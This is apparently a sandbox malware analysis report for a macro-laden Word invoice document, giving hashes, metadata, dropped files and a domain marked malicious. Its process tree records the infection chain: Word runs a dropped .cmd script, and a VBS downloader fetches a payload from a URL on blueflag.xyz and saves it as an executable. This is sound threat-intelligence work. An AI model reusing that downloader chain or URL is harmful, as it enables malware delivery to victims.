File name: | inv_261804.doc |
Full analysis: | https://app.any.run/tasks/14d9532b-e6fd-4c89-a401-42e7f857d357 |
Verdict: | Malicious activity |
Analysis date: | February 21, 2020, 21:47:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 487EA5406A04BC22A793142B5AB87DE6 |
SHA1: | 50CA216F6FA3219927CD1676AF716DCE6D0C59C2 |
SHA256: | 01EA3845EAC489A2518962E6A9F968CDE0811E1531F5A58718FB02CF62541EDC |
SSDEEP: | 1536:hf03vE7LfAoH78R4tqWtyEPx0412G4g2Cdbiag:hyE7LfAOJoOx0A6ag |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Creator: | - |
---|
ModifyDate: | 2020:02:20 13:47:00Z |
---|---|
CreateDate: | 2020:02:20 13:47:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
AppVersion: | 12 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 19 |
LinksUpToDate: | No |
TitlesOfParts: | |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | Password protected |
Application: | Microsoft Office Word |
Characters: | 18 |
Words: | 2 |
Pages: | 2 |
TotalEditTime: | - |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 422 |
ZipCRC: | 0x840a1a99 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2644 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\inv_261804.doc.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3004 | cmd /c ""C:\DecemberLogs\Restaraunt2.cmd" " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1780 | wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://blueflag.xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin C:\DecemberLogs\Caff54e1.exe | C:\Windows\system32\wscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7586.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:98FF95DFB0A77E84FC6006F21B366A92 | SHA256:485900EFA4E4B1B2177D0F8DB2E1647C9623C2B5AC267FDFAB84E86686BDBBCB | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\ATLEntityPickerLib.exd | tlb | |
MD5:4C063799AA30D2F5C7A390A0D3348739 | SHA256:7F3D9AF9A5CEB00382CA7811B2A6FAEA4410385BF0DD54184C122C08419D8C95 | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C887858874BF2E56CF6039A79CE00FFB | SHA256:563E642725FA8FF18B27CA910C49BBAFC3C9E0E0A8821D6C1BD6CBB750224D4C | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\NODEMGRLib.exd | tlb | |
MD5:248090C04774367691CCC1CA5F53F26B | SHA256:E946A634E2272590D04764C4F62D6AF51A97A6427CA74EAF0BCBA7DC32E2A808 | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSINKAUTLib.exd | tlb | |
MD5:3A53B04C63797DD82750BF5C380ADFDA | SHA256:1F89F488DD2C783A47A35963B1993FECF97FA8B52C318D23FB82D6DEAAB7936F | |||
2644 | WINWORD.EXE | C:\Users\admin\Desktop\~$v_261804.doc.docm | pgc | |
MD5:72D8D780F2CE9770184D4A13E023E797 | SHA256:C2C997AF1DBAFB2E112312BB912803ABFD5E426A51949DA5133F1E340A7E0D76 | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:50254A5B3B051E639CE09884A8937BC5 | SHA256:06801308059FEC951342BF0CF9C9CFEF2EAA0C90B198ADD2B240D5FFD200C50D | |||
2644 | WINWORD.EXE | C:\DecemberLogs\Restaraunt2.cmd | text | |
MD5:489E44E19F164BD7176EF7E341F48464 | SHA256:DAC5F163686C4A3162DBC3C041C60E0127241966FE305012604F98FD6F058AC0 | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\inv_261804.doc.docm.LNK | lnk | |
MD5:5153F6D787270DBC60C798100D5212C2 | SHA256:A0F84374C371CC90DFA1BDC60E83F00D5C6BAB1098258A03B5B738624729C8E9 |
Domain | IP | Reputation |
---|---|---|
blueflag.xyz |
| malicious |